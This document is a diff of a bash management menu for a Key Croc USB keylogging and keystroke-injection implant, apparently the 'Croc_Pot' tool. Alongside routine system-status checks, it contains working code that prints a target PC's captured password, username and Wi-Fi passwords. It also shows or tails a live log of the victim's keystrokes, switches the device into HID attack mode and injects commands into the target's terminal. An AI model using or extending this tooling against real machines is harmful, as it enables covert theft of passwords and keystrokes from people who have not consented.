${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + vmstat | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; df -h | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; iostat | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } cpu_check() { clear - echo -ne "\n$(ColorYellow 'CPU load on') ${server_name} is:\n" - more /proc/cpuinfo && lscpu | grep MHz --color=auto - lscpu | egrep 'Model name|Socket|Thread|NUMA|CPU\(s\)' - echo "Threads/core: $(nproc --all)" - echo "Number of CPU/cores online at $HOSTNAME: $(getconf _NPROCESSORS_ONLN)" - echo -ne "CPU TEMP: $(cat /sys/class/thermal/thermal_zone0/temp)°C USAGE: $(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}')" + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}CPU STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'CPU load on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + more /proc/cpuinfo && lscpu | grep MHz --color=auto | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; lscpu | egrep 'Model name|Socket|Thread|NUMA|CPU\(s\)' | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + echo "Threads/core: $(nproc --all)" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; echo "Number of CPU/cores online at $HOSTNAME: $(getconf _NPROCESSORS_ONLN)" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + echo -ne "CPU TEMP: $(cat /sys/class/thermal/thermal_zone0/temp)°C USAGE: $(top -bn1 | grep "Cpu(s)" | sed "s/.*, *\([0-9.]*\)%* id.*/\1/" | awk '{print 100 - $1"%"}')\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } tcp_check() { clear - echo -ne "\n$(ColorYellow 'Network/connections on') ${server_name} is:\n" - netstat -l ; echo ${LINE} ; netstat -r ; echo ${LINE} ; netstat -tunlp ; echo ${LINE} ; iw dev wlan0 scan - iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort ; echo ${LINE} - arp -a -e -v ; echo ${LINE} ; ss -p -a ; echo ${LINE} ; /sbin/ifconfig -a + rm ${LOOT_INFO} + install_package speedtest-cli SPEEDTEST-CLI tcp_check + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}NETWORK STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Network/connections on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + netstat -l | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; netstat -r | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; netstat -tunlp | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; iw dev wlan0 scan | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + iw wlan0 scan | egrep --extended-regexp 'BSS ([[:xdigit:]]{1,2}:)|signal: |SSID: |\* Manufacturer: |\* Model Number: |\* Serial Number: |\* Device name: ' | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + arp -a -e -v | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; ss -p -a | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; for interface in $(ls /sys/class/net/); do echo -ne "${interface}\n"; done | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; /sbin/ifconfig -a | tee -a ${LOOT_INFO} + echo ${LINE} | tee -a ${LOOT_INFO} ; curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; speedtest | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } kernel_check() { clear - echo -ne "\n$(ColorYellow 'Kernel version on') ${server_name} is:\n" - uname --all - hostnamectl - cat /proc/version + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}KERNEL STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Kernel version on') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + uname --all | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; hostnamectl | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; cat /proc/version | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } processes_check() { clear - echo -ne "\n$(ColorYellow 'Running Processes') ${server_name} is:\n" - ps -aux ; echo ${LINE} ; service --status-all ; echo ${LINE} ; findmnt -A ; echo ${LINE} ; usb-devices + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}PROCESSES STATUS${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "${yellow}Last logins:${clear}\n" | tee -a ${LOOT_INFO} ; last -a | head -3 | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'Running Processes') ${server_name} is:\n" | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} + ps -aux | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; service --status-all | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; findmnt -A | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} ; usb-devices | tee -a ${LOOT_INFO} ; echo ${LINE} | tee -a ${LOOT_INFO} } ## -#----Status KeyCroc info +#----Status check all KeyCroc info ## all_checks() { clear - local LOOT_INFO=/root/udisk/loot/Croc_Pot/KeyCroc_INFO.txt - rm -f ${LOOT_INFO} - croc_title_loot >> ${LOOT_INFO} + rm ${LOOT_INFO} + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}ALL CHECK STATUS${LINE_}\n" | tee -a ${LOOT_INFO} echo -ne "\t${LINE_}KEYCROC INFO${LINE_}\n${LINE}\nCROC FIRMWARE: $(cat /root/udisk/version.txt)\nKEYCROC CONFIG SETTING:\n$(sed -n '/^[DWS]/p' /root/udisk/config.txt)\n${LINE}\nUSER NAME: $(whoami)\nHOSTNAME: $(cat /proc/sys/kernel/hostname) IP: $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) $(ifconfig eth0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)\nPUBLIC IP: $(curl ifconfig.co)\nMAC ADDRESS: $(ip -o link | awk '$2 != "lo:" {print $2, $(NF-2)}')\n${LINE}\nVARIABLES CURRENT USER:\n$(env)\n${LINE}\n INTERFACE: $(ip route show default | awk '/default/ {print $5}')\nMODE: $(cat /tmp/mode)\nSSH: root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)\nDNS: $(sed -n -e 4p /etc/resolv.conf)\nDNS: $(sed -n -e 5p /etc/resolv.conf)\nDISPLAY ARP: $(ip n)\n${LINE}\nROUTE TALBE: $(ip r)\nNETWORK:\n$(ifconfig -a)\n${LINE}\nSYSTEM UPTIME: $(uptime)\n SYSTEM INFO: $(uname -a)\n${LINE}\nUSB DEVICES:\n$(usb-devices)\n${LINE}\nBASH VERSION:\n$(apt-cache show bash)\n${LINE}\nLINUX VERSION:\n$(cat /etc/os-release)\n${LINE}\nSSH KEY:\n$(ls -al ~/.ssh)\n$(cat ~/.ssh/id_rsa.pub)\n${LINE}\n MEMORY USED:\n$(free -m)\n$(cat /proc/meminfo)\n${LINE}\nSHOW PARTITION FORMAT:\n$(lsblk -a)\n${LINE}\nSHOW DISK USAGE:\n$(df -TH)\n\t${LINE_A}>MORE DETAIL<${LINE_A}\n$(fdisk -l)\n${LINE}\nCHECK USER LOGIN:\n$(lastlog)\n${LINE}\nCURRENT PROCESS:\n$(ps aux)\n${LINE}\nCPU INFORMATION:\n$(more /proc/cpuinfo)\n$(lscpu | grep MHz)\n${LINE}\nCHECK PORT:\n$(netstat -tulpn)\n -${LINE}\nRUNNING SERVICES:\n$(service --status-all)\n${LINE}\nINSTALLED PACKAGES:\n$(dpkg-query -l)\n${LINE}\nIDENTIFIER (UUID):\n$(blkid)\n${LINE}\nDIRECTORIES:\n$(ls -la -r /etc /var /root /tmp /usr /sys /bin /sbin)\n${LINE}\nDISPLAY TREE:\n$(pstree)\n${LINE}\nSHELL OPTIONS:\n$(shopt)\n${LINE}\n" >> ${LOOT_INFO} +${LINE}\nRUNNING SERVICES:\n$(service --status-all)\n${LINE}\nINSTALLED PACKAGES:\n$(dpkg-query -l)\n${LINE}\nIDENTIFIER (UUID):\n$(blkid)\n${LINE}\nDIRECTORIES:\n$(ls -la -r /etc /var /root /tmp /usr /sys /bin /sbin)\n${LINE}\nDISPLAY TREE:\n$(pstree)\n${LINE}\nSHELL OPTIONS:\n$(shopt)\n${LINE}\n" >> ${LOOT_INFO} ; curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com ; echo "${LINE}" cat ${LOOT_INFO} } ## @@ -3933,24 +5658,27 @@ ${LINE}\nRUNNING SERVICES:\n$(service --status-all)\n${LINE}\nINSTALLED PACKAGES ## pc_info() { clear + rm ${LOOT_INFO} local CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt local CROC_OS_TARGET=/root/udisk/tools/Croc_Pot/Croc_OS_Target.txt if [ "$(OS_CHECK)" = WINDOWS ]; then - echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK) -$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS}) -$(ColorYellow 'Target PC Passwd:')${green} $(target_pw) -$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET}) -$(ColorYellow 'Target Pc IP:')${green} $(sed '2,6!d' ${CROC_OS_TARGET}) + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}TARGET PC INFO${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK)${clear} +$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS})${clear} +$(ColorYellow 'Target PC Passwd:')${green} $(target_pw)${clear} +$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET})${clear} +$(ColorYellow 'Target Pc IP:')${green} $(sed '2,6!d' ${CROC_OS_TARGET})${clear} $(ColorYellow 'Target Pc SSID + PASSWD and MAC address:')${green} -$(sed '9,24!d' ${CROC_OS_TARGET})\n" +$(sed '9,24!d' ${CROC_OS_TARGET})${clear}\n" | tee -a ${LOOT_INFO} elif [ "$(OS_CHECK)" = LINUX ]; then - echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK) -$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS}) -$(ColorYellow 'Target PC Passwd:')${green} $(target_pw) -$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET}) -$(ColorYellow 'Target Pc IP:')${green} $(sed -n '2,3p' ${CROC_OS_TARGET}) + croc_title_loot | tee ${LOOT_INFO} ; echo -e "\n\t${LINE_}TARGET PC INFO${LINE_}\n" | tee -a ${LOOT_INFO} + echo -ne "\n$(ColorYellow 'KeyCroc is pluged into:')${green} $(OS_CHECK)${clear} +$(ColorYellow 'Target PC Host name:')${green} $(sed -n 3p ${CROC_OS})${clear} +$(ColorYellow 'Target PC Passwd:')${green} $(target_pw)${clear} +$(ColorYellow 'Target Pc user name:')${green} $(sed -n 1p ${CROC_OS_TARGET})${clear} +$(ColorYellow 'Target Pc IP:')${green} $(sed -n '2,3p' ${CROC_OS_TARGET})${clear} $(ColorYellow 'Target Pc SSID + PASSWD and MAC address:')${green} -$(sed '4,20!d' ${CROC_OS_TARGET})${clear}\n" +$(sed '4,20!d' ${CROC_OS_TARGET})${clear}\n" | tee -a ${LOOT_INFO} else echo -ne "$(ColorRed 'PLEASE RUN CROC_POT PAYLOAD TO GET TARGET PC USER NAME AND IP')" fi @@ -3959,43 +5687,65 @@ fi #----Status start live keystorke ## keystorkes_V() { - echo -ne "\e[5m$(ColorYellow 'PRESS COMTROL + C TO EXIT')" - sleep 2 - cd loot - tail -f croc_char.log - menu_A + clear + echo -ne "$(Info_Screen ' +-PRESS CONTROL + C TO EXIT live keylog +-View croc_char.log filter out [ENTER] [BACKSPACE]..ect +-To read full croc_char.log file enter arming mode to sync file')\n" + sleep 3 + cat /root/udisk/loot/croc_char.log | sed 's/\[ENTER]/\n/g' | sed 's/\[[^]]*\]//g' | sed '/^[[:space:]]*$/d' | tr -s ' ' + echo -ne "\n\e[48;5;202;30m${LINE}${clear}\n" + read_all START LIVE KEYLOG Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + tail -f /root/udisk/loot/croc_char.log ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; keystorkes_V ;; +esac } ## #----Status nmon monitoring system ## nmon_system() { - echo -ne "$(Info_Screen '-nmon is short for Nigels performance Monitor for Linux + echo -ne "$(Info_Screen ' +-nmon is short for Nigels performance Monitor for Linux -More details at http://nmon.sourceforge.net/pmwiki.php')\n\n" install_package nmon NMON_MONITORING nmon_system croc_status -nmon + read_all START NMON MONITOR Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + nmon ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; nmon_system ;; +esac } ## #----Status list all match words in payloads ## list_match() { clear - echo -ne "$(Info_Screen '-List all MATCH words in payloads folder + echo -ne "$(Info_Screen ' +-List all MATCH words in payloads folder -Option to change MATCH words')\n\n" if [ "$(OS_CHECK)" = WINDOWS ]; then grep MATCH* /root/udisk/payloads/*.txt elif [ "$(OS_CHECK)" = LINUX ]; then grep MATCH* --color=auto /root/udisk/payloads/*.txt fi - read_all CHANGE MATCH WORD FOR PAYLOAD Y/N AND PRESS [ENTER] - case $r_a in + read_all CHANGE MATCH WORD FOR PAYLOAD Y/N AND PRESS [ENTER] ; p_l=${r_a} + case $p_l in [yY] | [yY][eE][sS]) - read_all ENTER THE PAYLOAD NAME TO CHANGE MATCH WORD AND PRESS [ENTER] - if [ -e "/root/udisk/payloads/${r_a}" ]; then - R_M=$(cat /root/udisk/payloads/${r_a} | grep MATCH | awk {'print $2'}) + read_all ENTER THE PAYLOAD NAME TO CHANGE MATCH WORD AND PRESS [ENTER] ; name_change=${r_a} + if [ -e "/root/udisk/payloads/${name_change}.txt" ]; then + R_M=$(cat /root/udisk/payloads/${name_change}.txt | grep MATCH | awk {'print $2'}) echo -ne "$(ColorYellow 'Current Match word is ')${green}${R_M}${clear}\n" - echo -ne "${blue}ENTER NEW MATCH WORD AND PRESS [ENTER]:${clear}"; read m_w - sed -i "/MATCH$/!{s/$R_M/$m_w/}" /root/udisk/payloads/${r_a} - grep MATCH* --color=always /root/udisk/payloads/${r_a} + read_all ENTER NEW MATCH WORD AND PRESS [ENTER] ; m_w=${r_a} + sed -i "/MATCH$/!{s/$R_M/$m_w/}" /root/udisk/payloads/${name_change}.txt + grep MATCH* --color=always /root/udisk/payloads/${name_change}.txt else invalid_entry ; list_match fi ;; @@ -4006,38 +5756,31 @@ fi esac } ## +#----Croc Status check local weather +## +check_weather() { + Q ALT-SPACE + Q STRING "x" + curl wttr.in + sleep 5 + curl wttr.in/moon + sleep 5 +# Q ALT-SPACE +# sleep 1 +# Q STRING "r" +# sleep 1 + menu_A +} +## #----Croc Status Menu ## menu_A() { LED B -MenuTitle KEYCROC STATUS MENU -MenuColor 1 MEMORY USAGE ; echo -ne " ${clear}\n" -MenuColor 2 CPU LOAD ; echo -ne " ${clear}\n" -MenuColor 3 NETWORK-CONNECTIONS ; echo -ne " ${clear}\n" -MenuColor 4 KERNEL VERSION ; echo -ne " ${clear}\n" -MenuColor 5 RUNNING PROCESSES ; echo -ne " ${clear}\n" -MenuColor 6 CHECK ALL ; echo -ne " ${clear}\n" -MenuColor 7 TARGET PC INFO ; echo -ne " ${clear}\n" -MenuColor 8 VIEW LIVE KEYSTORKES ; echo -ne " ${clear}\n" -MenuColor 9 START NMON MONITORING ; echo -ne " ${clear}\n" -MenuColor 10 LIST MATCH PAYLOADS WORDS ; echo -ne " ${clear}\n" -MenuColor 11 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle KEYCROC STATUS MENU ; MenuColor 27 1 MEMORY USAGE ; MenuColor 27 2 CPU LOAD ; MenuColor 27 3 NETWORK-CONNECTIONS ; MenuColor 27 4 KERNEL VERSION ; MenuColor 27 5 RUNNING PROCESSES +MenuColor 27 6 CHECK ALL ; MenuColor 27 7 TARGET PC INFO ; MenuColor 27 8 VIEW LIVE KEYSTORKES ; MenuColor 27 9 START NMON MONITORING ; MenuColor 26 10 LIST MATCH PAYLOADS WORDS ; MenuColor 26 11 CHECK LOCAL WEATHER ; MenuColor 26 12 RETURN TO MAIN MENU ; MenuEnd 30 case $m_a in - 1) memory_check ; menu_A ;; - 2) cpu_check ; menu_A ;; - 3) tcp_check ; menu_A ;; - 4) kernel_check ; menu_A ;; - 5) processes_check ; menu_A ;; - 6) all_checks ; menu_A ;; - 7) pc_info ; menu_A ;; - 8) keystorkes_V ; menu_A ;; - 9) nmon_system ; menu_A ;; - 10) list_match ; menu_A ;; - 11) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; menu_A ;; + 1) memory_check ; menu_A ;; 2) cpu_check ; menu_A ;; 3) tcp_check ; menu_A ;; 4) kernel_check ; menu_A ;; 5) processes_check ; menu_A ;; 6) all_checks ; menu_A ;; + 7) pc_info ; menu_A ;; 8) keystorkes_V ; menu_A ;; 9) nmon_system ; menu_A ;; 10) list_match ; menu_A ;; 11) check_weather ;; 12) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; menu_A ;; esac } menu_A @@ -4078,11 +5821,10 @@ fi #----Edit remove file Function ## remove_file() { - cd - ls -aRd $PWD/* --color=auto - ls -R --color=auto - echo "" - read_all ENTER THE PATH TO FILE NAME YOU WISH TO REMOVE AND PRESS [ENTER] + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FILE NAME YOU WISH TO REMOVE AND PRESS [ENTER] if [ -e "${r_a}" ]; then LED R echo -ne ${LINE_}"\e[5m$(ColorRed 'This file will be removed') ${r_a}"${LINE_} @@ -4092,11 +5834,26 @@ else fi } ## +#----Edit any file on keycroc file Function +## +user_edit() { + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FILE NAME TO EDIT AND PRESS [ENTER] +if [ -e "${r_a}" ]; then + nano ${r_a} +else + invalid_entry ; croc_edit_menu +fi +} +## #----midnight commander, visual file manager ## midnight_manager() { clear - echo -ne "$(Info_Screen '-GNU Midnight Commander is a visual file manager + echo -ne "$(Info_Screen ' +-GNU Midnight Commander is a visual file manager -More details at https://midnight-commander.org')\n" ## #----midnight install function @@ -4123,20 +5880,9 @@ mc_remove() { ## #----midnight Menu ## -MenuTitle MIDNIGHT COMMANDER MENU -MenuColor 1 INSTALL MIDNIGHT COMMANDER ; echo -ne " ${clear}\n" -MenuColor 2 REMOVE MIDNIGHT COMMANDER ; echo -ne " ${clear}\n" -MenuColor 3 START MIDNIGHT COMMANDER ; echo -ne " ${clear}\n" -MenuColor 4 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle MIDNIGHT COMMANDER MENU ; MenuColor 26 1 INSTALL MIDNIGHT COMMANDER ; MenuColor 26 2 REMOVE MIDNIGHT COMMANDER ; MenuColor 26 3 START MIDNIGHT COMMANDER ; MenuColor 26 4 RETURN TO MAIN MENU ; MenuEnd 29 case $m_a in - 1) mc_install ; midnight_manager ;; - 2) mc_remove ; midnight_manager ;; - 3) mc ; midnight_manager ;; - 4) main_menu ;; - 0) exit 0 ;; - [bB]) croc_edit_menu ;; - *) invalid_entry ; midnight_manager ;; + 1) mc_install ; midnight_manager ;; 2) mc_remove ; midnight_manager ;; 3) mc ; midnight_manager ;; 4) main_menu ;; 0) exit 0 ;; [bB]) croc_edit_menu ;; *) invalid_entry ; midnight_manager ;; esac } ## @@ -4144,7 +5890,8 @@ MenuEnd ## insert_quack() { clear - echo -ne "$(Info_Screen '-This will open Target pc terminal + echo -ne "$(Info_Screen ' +-This will open Target pc terminal -Insert Quack command -Example enter echo "hello world" -hello world should display in terminal and exit')\n\n" @@ -4220,36 +5967,11 @@ esac #----Croc Edit Menu ## LED B -MenuTitle CROC EDIT MENU -MenuColor 1 CROC PAYLOADS FOLDER ; echo -ne " ${clear}\n" -MenuColor 2 CROC TOOLS FOLDER ; echo -ne " ${clear}\n" -MenuColor 3 CROC LOOT FOLDER ; echo -ne " ${clear}\n" -MenuColor 4 CROC CONFIG FILE ; echo -ne " ${clear}\n" -MenuColor 5 CROC ENTER FILE NAME ; echo -ne " ${clear}\n" -MenuColor 6 CROC REMOVE FILES ; echo -ne " ${clear}\n" -MenuColor 7 ATTACKMODE HID STORAGE ; echo -ne " ${clear}\n" -MenuColor 8 ATTACKMODE HID ; echo -ne " ${clear}\n" -MenuColor 9 RELOAD_PAYLOADS ; echo -ne " ${clear}\n" -MenuColor 10 MIDNIGHT MANAGER ; echo -ne " ${clear}\n" -MenuColor 11 QUACK COMMAND ; echo -ne " ${clear}\n" -MenuColor 12 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle CROC EDIT MENU ; MenuColor 22 1 CROC PAYLOADS FOLDER ; MenuColor 22 2 CROC TOOLS FOLDER ; MenuColor 22 3 CROC LOOT FOLDER ; MenuColor 22 4 CROC CONFIG FILE ; MenuColor 22 5 CROC ENTER FILE NAME ; MenuColor 22 6 CROC REMOVE FILES +MenuColor 22 7 ATTACKMODE HID STORAGE ; MenuColor 22 8 ATTACKMODE HID ; MenuColor 22 9 RELOAD_PAYLOADS ; MenuColor 21 10 MIDNIGHT MANAGER ; MenuColor 21 11 QUACK COMMAND ; MenuColor 21 12 RETURN TO MAIN MENU ; MenuEnd 25 case $m_a in - 1) edit_all /root/udisk/payloads ; croc_edit_menu ;; - 2) edit_all /root/udisk/tools ; croc_edit_menu ;; - 3) edit_all /root/udisk/loot ; croc_edit_menu ;; - 4) edit_config ; croc_edit_menu ;; - 5) edit_all ; croc_edit_menu ;; - 6) remove_file ; croc_edit_menu ;; - 7) ATTACKMODE HID STORAGE ; croc_edit_menu ;; - 8) ATTACKMODE HID ; croc_edit_menu ;; - 9) RELOAD_PAYLOADS ; croc_edit_menu ;; - 10) midnight_manager ; croc_edit_menu ;; - 11) insert_quack ; croc_edit_menu ;; - 12) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; croc_edit_menu ;; + 1) edit_all /root/udisk/payloads ; croc_edit_menu ;; 2) edit_all /root/udisk/tools ; croc_edit_menu ;; 3) edit_all /root/udisk/loot ; croc_edit_menu ;; 4) edit_config ; croc_edit_menu ;; 5) user_edit ; croc_edit_menu ;; 6) remove_file ; croc_edit_menu ;; + 7) ATTACKMODE HID STORAGE ; croc_edit_menu ;; 8) ATTACKMODE HID ; croc_edit_menu ;; 9) RELOAD_PAYLOADS ; croc_edit_menu ;; 10) midnight_manager ; croc_edit_menu ;; 11) insert_quack ; croc_edit_menu ;; 12) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; croc_edit_menu ;; esac } ## @@ -4263,94 +5985,137 @@ function ssh_menu() { ## install_package sshpass SSHPASS ssh_menu # -# Validate IP v4 or v6 address and start ssh to hak5 device +#----Check and start ssh to hak5 device # ip_check_ssh() { -if [[ "${r_a}" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]]; then - ssh root@${r_a} +ping -q -c 1 -w 1 ${1} &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + ping -q -c 1 -w 1 ${2} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "\e[5m$(ColorRed 'Can not start SSH connect on:')${2}${clear}" + elif [[ "${#args[@]}" -eq 0 ]]; then + ssh root@${2} + fi +elif [[ "${#args[@]}" -eq 0 ]]; then + ssh root@${1} else - echo -ne "\e[5m$(ColorRed 'USING DEFAULT IP')${1}" - ssh root@${1} + echo -ne "\e[5m$(ColorRed 'Can not start SSH connect on:')${1}${clear}" fi } ## #----SSH check devices for connection ## check_device() { -if ping -q -c 1 -w 1 ${1} &>/dev/null 2>&1; then - echo -ne "${yellow}${2} ${3} ${clear}${green}ONLINE IP:${1} ${clear}${4} ${5}" -else - echo -ne "${yellow}${2} ${3} ${clear}${red}NOT CONNECTED OR CAN'T BE REACHED ${clear}" +ping -q -c 1 -w 1 ${1} &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + ping -q -c 1 -w 1 ${DEFAULT_IP} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + sleep 0.1 + elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "\e[38;5;19;4;1;48;5;245m${@:2}${clear}${yellow}:${clear}${green}ONLINE${clear}${yellow} IP:${clear}${green}$(ping -q -c 1 -w 1 ${DEFAULT_IP} | sed -nE 's/^PING[^(]+\(([^)]+)\).*/\1/p')${clear}" ; get_mac ${1} ; port_check ${1} + fi +elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "\e[38;5;19;4;1;48;5;245m${@:2}${clear}${yellow}:${clear}${green}ONLINE${clear}${yellow} IP:${clear}${green}$(ping -q -c 1 -w 1 ${1} | sed -nE 's/^PING[^(]+\(([^)]+)\).*/\1/p')${clear}" ; get_mac ${1} ; port_check ${1} fi 2> /dev/null } ## +#----SSH check default ip +## +default_ip() { + unset DEFAULT_IP + DEFAULT_IP=${1} +} +## #----SSH shark jack get ip from Croc_Pot_Payload ## shark_check() { local SHARK_IP=/root/udisk/tools/Croc_Pot/shark_ip.txt if [ -e ${SHARK_IP} ]; then - if [ "$(sed -n '1p' ${SHARK_IP})" != "" ]; then - IP_F=$(sed -n '1p' ${SHARK_IP}) + if [[ "$(sed -n '1p' ${SHARK_IP})" =~ ${validate_ip} ]]; then + default_ip $(sed -n '1p' ${SHARK_IP}) else - IP_F=172.16.24.1 + 